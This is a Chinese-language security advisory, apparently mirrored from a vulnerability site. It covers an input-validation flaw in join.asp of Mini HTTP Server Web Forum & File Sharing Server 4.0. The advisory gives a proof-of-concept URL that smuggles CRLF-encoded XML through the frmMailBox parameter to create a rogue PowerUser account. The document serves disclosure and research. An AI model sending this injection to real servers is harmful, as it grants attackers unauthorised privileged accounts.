发布日期：2006-10-25
更新日期：2006-10-27

受影响系统：

Mini HTTP Server Web Forum & File Sharing Server 4.0

描述：

---

BUGTRAQ  ID: 20743

Web Forum & File Sharing Server允许用户在Internet上创建自己的论坛。

Web Forum & File Server在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞非授权操作论坛。

Web Forum & File Server的join.asp文件没有正确验证frmMailBox参数数据的输入，允许攻击者未经授权便以PowerUser的权限添加新的论坛用户。

<*来源：Greg Linares （glinares.code@gmail.com）
  
  链接：http://secunia.com/advisories/22568/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

me@blah.net%0d%0a%0d%0a%0d%0a<Username>eviluser</Username><Password>1234</Pas" target="_blank">http://www.example.com/join.asp?frmUserID=legituser1&frmUserPass=1234&frmMailBox=me@blah.net%0d%0a%0d%0a%0d%0a<Username>eviluser</Username><Password>1234</Pas
sword><Accessright>PowerUser</Accessright><Email>Fake_Email@here.net

建议：

---

厂商补丁：

Mini HTTP Server
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.minihttpserver.net/bbs/index.php

浏览次数：2831
严重程度：0（网友投票）